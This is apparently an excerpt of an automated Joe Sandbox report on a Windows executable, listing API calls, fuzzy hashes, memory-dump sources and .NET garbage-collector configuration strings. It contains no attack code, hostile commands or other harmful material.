                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF658566538,?,?,0000000B,00007FF658565400,?,?,00000000,00007FF65855F7C1), ref: 00007FF658562A07
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF658566538,?,?,0000000B,00007FF658565400,?,?,00000000,00007FF65855F7C1), ref: 00007FF658562A27
                                                • VirtualAllocExNuma.KERNEL32 ref: 00007FF658562A48
                                                Similarity
                                                • API ID: AllocVirtual$CurrentNumaProcess
                                                • String ID:
                                                • API String ID: 647533253-0
                                                • Opcode ID: 625f1e7399fc93da6f37fa1e0330fb08ecf441602bb64bf0d621cc29f3cf2d2c
                                                • Instruction ID: cdf30caed5a30129d8192174aef91cbd90450ed1d870e85d7da806df69f72a98
                                                • Opcode Fuzzy Hash: 625f1e7399fc93da6f37fa1e0330fb08ecf441602bb64bf0d621cc29f3cf2d2c
                                                • Instruction Fuzzy Hash: A5F0AF71B086A1C6EB208B16F404219A760EB49FD8F584139EF9C6BF58DF3DC5818B04

                                                Control-flow Graph

                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: df8486f038e79b547ccdb021daa754100f3a5205bbaa03da553d2b0464387378
                                                • Instruction ID: e5c7a67a1d901cfbaf4c3b35220c441f2d4880e33fb18e83a9e29ed793b92c5a
                                                • Opcode Fuzzy Hash: df8486f038e79b547ccdb021daa754100f3a5205bbaa03da553d2b0464387378
                                                • Instruction Fuzzy Hash: 5FE0CD34F16501C9FF589733684552816516F89B00FD8C038C40E96F50DE2E5156DB04

                                                Control-flow Graph

                                                APIs
                                                • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF6585E1A10,?,?,00000030), ref: 00007FF6585E1BC9
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: bcab976dc68f312849d0fcdc6b43bb40a9dcb7c7cf9a6a9b11be4ce990bc2283
                                                • Instruction ID: aafef96109159ae905925f9e2750a07a39b8d03d7138741ef8f370361cd08f7b
                                                • Opcode Fuzzy Hash: bcab976dc68f312849d0fcdc6b43bb40a9dcb7c7cf9a6a9b11be4ce990bc2283
                                                • Instruction Fuzzy Hash: F031B022E4861795FB91AB71EC413BD22A46F44784F5C4172DD0EFBF96DE2CE8858348

                                                Control-flow Graph

                                                Similarity
                                                • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                • String ID:
                                                • API String ID: 2131581837-0
                                                • Opcode ID: 5a77206ce6067a246c4da80bd04c8f1e90611e81ec538006d8f25cd51997ff1c
                                                • Instruction ID: 77b055686412fa4d140d6c4223ab68120a916c6c72c20e5d2c553a93942137c0
                                                • Opcode Fuzzy Hash: 5a77206ce6067a246c4da80bd04c8f1e90611e81ec538006d8f25cd51997ff1c
                                                • Instruction Fuzzy Hash: 82114C7290878182DAA4DF25E4011AEB350FB457B0F584339E6BE57BD6DF38D5468704
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 466d4d9c988fe849325ae7168e876d2e859bac2774cb7984135f3943153e00f4
                                                • Instruction ID: 3d0a1fef33baaa53dce145fd9b765949489816b9f01f31d529173349e7cd5c8a
                                                • Opcode Fuzzy Hash: 466d4d9c988fe849325ae7168e876d2e859bac2774cb7984135f3943153e00f4
                                                • Instruction Fuzzy Hash: 15B01214F16111C6E70427337C8270C02242B05F02FD80028C608F4A90CD1E81E52B04
                                                Similarity
                                                • API ID:
                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCPath$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.Path$System.GC.RetainVM$System.GC.Server
                                                • API String ID: 0-1379766591
                                                • Opcode ID: aea8e211407e160569e901d7ffe0990671890cbd52ae028845b6437f3ac61894
                                                • Instruction ID: 180ac5aeadd6de51e15d46ff03369a8eb54f4848e15a3a5b1d99d67af8aa15ed
                                                • Opcode Fuzzy Hash: aea8e211407e160569e901d7ffe0990671890cbd52ae028845b6437f3ac61894
                                                • Instruction Fuzzy Hash: 9F426F61608B5782EB209B35FC50AA967A5FF657C8F891132D98D57F28DF3CD206CB08
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: strcmp
                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDTargetTCP$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DTargetTCP$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LOHThreshold$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                • API String ID: 1004003707-1492036319
                                                • Opcode ID: 36b66872262398e0886a26fc236604f32fdc404a408f84d1ed38b3fdaa7ebc27
                                                • Instruction ID: 621538f02bb99687fd76239c9cde2af8b784a41907d28c2342852dba381ac2d1
                                                • Opcode Fuzzy Hash: 36b66872262398e0886a26fc236604f32fdc404a408f84d1ed38b3fdaa7ebc27
                                                • Instruction Fuzzy Hash: DF62C464D8DB8794FA40DB75AC501BA2BA1AF65740F8C0032C48FE7F66DF2CA159C768
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                • String ID: SeLockMemoryPrivilege
                                                • API String ID: 1752251271-475654710
                                                • Opcode ID: c8564b734ccbaacaf3b0576976fb44c3c840db276b6d24103a14a80d5a63f89b
                                                • Instruction ID: e0c1f3ecf466ea6343c15c0700f8af3754b45bf89e2928d6ce2d5b76597139f3
                                                • Opcode Fuzzy Hash: c8564b734ccbaacaf3b0576976fb44c3c840db276b6d24103a14a80d5a63f89b
                                                • Instruction Fuzzy Hash: 6331C571A0CA4286FB609B71F44837A6BA1EF84B94F584035DA4EA7F54DF3CD444DB04
                                                APIs
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556B58
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556CAB
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556D83
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556D99
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556E15
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise
                                                • String ID: [ KeepUnwinding ]
                                                • API String ID: 2546344036-400895726
                                                • Opcode ID: f7ede3c50903ac8ce56ed10b7c6191f6e45cf248f9fd1a0be10d847b8a15258f
                                                • Instruction ID: cc5b5d654ba56421d9f1181bb6493871e6a406fcc303ad221c1a1a6794481307
                                                • Opcode Fuzzy Hash: f7ede3c50903ac8ce56ed10b7c6191f6e45cf248f9fd1a0be10d847b8a15258f
                                                • Instruction Fuzzy Hash: CAB16A32A09B8281EB94CF35E4402A933E5FB44B58F5C4136CE4DABB98DF39E599C354
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: e16cdb098a0731bbeee2597424cfc557f813577fc17a189862b511b9686622a6
                                                • Instruction ID: 7e8746fb92928b9be4a238013a7761ed4b017577c9ff4a8be23c3c8e33332de5
                                                • Opcode Fuzzy Hash: e16cdb098a0731bbeee2597424cfc557f813577fc17a189862b511b9686622a6
                                                • Instruction Fuzzy Hash: 3D111C36B54F018AEB00CB70E8552A873A4FB19B68F580A31DA6D96BA4EF78D5548340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: 4f0f7fa2d29b35e5cdd09d60c3db837712e860f8bd82e74dd6b70f6fc053caec
                                                • Instruction ID: c2f353c34efa9f51d5be2f0423a97e5bb77121b29425d3f42b7fa7aec68e0679
                                                • Opcode Fuzzy Hash: 4f0f7fa2d29b35e5cdd09d60c3db837712e860f8bd82e74dd6b70f6fc053caec
                                                • Instruction Fuzzy Hash: 76B19E71A18B4286EB909B78D8402BC77A0FB44B84F684136DA5DE7B95DF3CE481CB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: @
                                                • API String ID: 3168844106-2766056989
                                                • Opcode ID: dd6d6a4e8923a7622559a3daf65e3807cab09e7ddf14f4fc5c8b3e1e00e80d67
                                                • Instruction ID: 5c10217492f5f81620ace290c66e7317a77f85884d15a58a81225b05b7b668c1
                                                • Opcode Fuzzy Hash: dd6d6a4e8923a7622559a3daf65e3807cab09e7ddf14f4fc5c8b3e1e00e80d67
                                                • Instruction Fuzzy Hash: 59916625A5C65281FBA09F36E84037863A0AF55B88F5D0435C95EE7EA5DF6EF880C708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: ab3dbcbadd1195aceb4dc0df65fd692d4c75df09f4a02271c42bf330f8f5443f
                                                • Instruction ID: 8e275105a0e5e3665514f13f773657f231168ee4806b6f5833b9a0056c3572cc
                                                • Opcode Fuzzy Hash: ab3dbcbadd1195aceb4dc0df65fd692d4c75df09f4a02271c42bf330f8f5443f
                                                • Instruction Fuzzy Hash: F7E17276A1969186EBA08F25E4003AD7371FB44B94F684132DA9DA3F98DF7CE441CB48
                                                APIs
                                                • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF658557E5B,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658561CEF
                                                • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF658557E5B,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658561D4C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: EnabledFeaturesState
                                                • String ID:
                                                • API String ID: 1557480591-0
                                                • Opcode ID: 4d09a7d10696eb70978a5361604ff01ff8ee2d975502abada3cc5e0683543bbf
                                                • Instruction ID: b96533b1b85c7fc1173a34364b9b99dade3fe0c95f78fe1ee081aa89c493bd28
                                                • Opcode Fuzzy Hash: 4d09a7d10696eb70978a5361604ff01ff8ee2d975502abada3cc5e0683543bbf
                                                • Instruction Fuzzy Hash: F151E032F8822202FFE8546E906937616975BA9360F4D4539DA4EE7AC2CD3FDC024608
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: 5372820b8d61e945878c808cb8805ea97cbf8da8ac7b2002d2442fc1065395d5
                                                • Instruction ID: 82db991532ad5b73b1dadbe7d2827ce8569a2ee54dba4140506ccc558c29dd8f
                                                • Opcode Fuzzy Hash: 5372820b8d61e945878c808cb8805ea97cbf8da8ac7b2002d2442fc1065395d5
                                                • Instruction Fuzzy Hash: DE418F22B18A9181EB908F36994127963A1FF48BC4F5C9036DE4EE7F55DF3CE4108308
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 0ee841b0041fd07083ad09a55eb67601aaff04cff13fea96335e112a1605f71b
                                                • Instruction ID: 538f3b0d83a06b26b47890c19182595a434fa255023d31622f7849425632b2bb
                                                • Opcode Fuzzy Hash: 0ee841b0041fd07083ad09a55eb67601aaff04cff13fea96335e112a1605f71b
                                                • Instruction Fuzzy Hash: 0442DA32A69A8681EA518F35E80027D77A1FB457A4F594236CE6EA3FD0DF3CE451C708
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ?
                                                • API String ID: 0-1684325040
                                                • Opcode ID: eb064bc1408a134021f5762006dc8a98f6b1344e3b1c1bba0f6a4c98f7415e32
                                                • Instruction ID: f696b96ed22d8d9a4fd152cc71beeb8a3a165154a545aec7a43921c8fba2142a
                                                • Opcode Fuzzy Hash: eb064bc1408a134021f5762006dc8a98f6b1344e3b1c1bba0f6a4c98f7415e32
                                                • Instruction Fuzzy Hash: 6512B132A18A8282EA94CB21E4447BD73A5FB55BD4F588231DA5EE3F94DF3CE441C748
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                • Instruction ID: e379c83f8a5965d71fff814e3439a14d777fcb5a214be40e9b80021165e0cbf2
                                                • Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                • Instruction Fuzzy Hash: 53D1BBB3A10B4987E7988F39A40926933A2FB45BE8F191235CE5D57B98DF38D910CB44
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce88b7bc960f67bff91534495d3b3fe2c5d14991d050d0a89b9e83d9d292686f
                                                • Instruction ID: e5ca11f17e91a0fb7aa6ebd61e82ffbd92600eb774ec154f427a85beebf30f5d
                                                • Opcode Fuzzy Hash: ce88b7bc960f67bff91534495d3b3fe2c5d14991d050d0a89b9e83d9d292686f
                                                • Instruction Fuzzy Hash: 7792C361A68B4685EA91DB35E8506B86395BF45BC4F6C4236D80FF3F61EF3CE0458B08
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02b1ad4ab20bfa8643531b44ce1abecbdb13974695cdd098e113f0528ef77cbf
                                                • Instruction ID: 8129b72d844ed02c937f86c18928a1ba4fc7f65ba9f8fff3e2170cc18bf238b4
                                                • Opcode Fuzzy Hash: 02b1ad4ab20bfa8643531b44ce1abecbdb13974695cdd098e113f0528ef77cbf
                                                • Instruction Fuzzy Hash: 42528E32B28B4186EB908F75E4441AD77E1FB44B88B284536DE5EA7F58CF3CE4558B08
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 682f8704a4cd320b1df5fe49dbd43fa57fbd70317c3501b9b4593f4467cd6572
                                                • Instruction ID: 317177fe2250e75a286f42f00a033cb077f63b6137a2c724836147d98532d663
                                                • Opcode Fuzzy Hash: 682f8704a4cd320b1df5fe49dbd43fa57fbd70317c3501b9b4593f4467cd6572
                                                • Instruction Fuzzy Hash: 9C32B022B19B4686EB90CBB5D4402BC27A5EB047D8B284536DE1EB7F88DF38E455C748
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc34d1225eea2875a0b725fa0f8db207bf965f41219ae361d99d9ec02d6a9fa6
                                                • Instruction ID: 5cdf8b44db76ba4817d813371f3bf7dceeec072d57ea415417b5deae4ede697e
                                                • Opcode Fuzzy Hash: dc34d1225eea2875a0b725fa0f8db207bf965f41219ae361d99d9ec02d6a9fa6
                                                • Instruction Fuzzy Hash: F31262E2615B9681EE958B29C44436967E1FF05BE4F1CD235CE2C93BD4DF6CD494C204
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
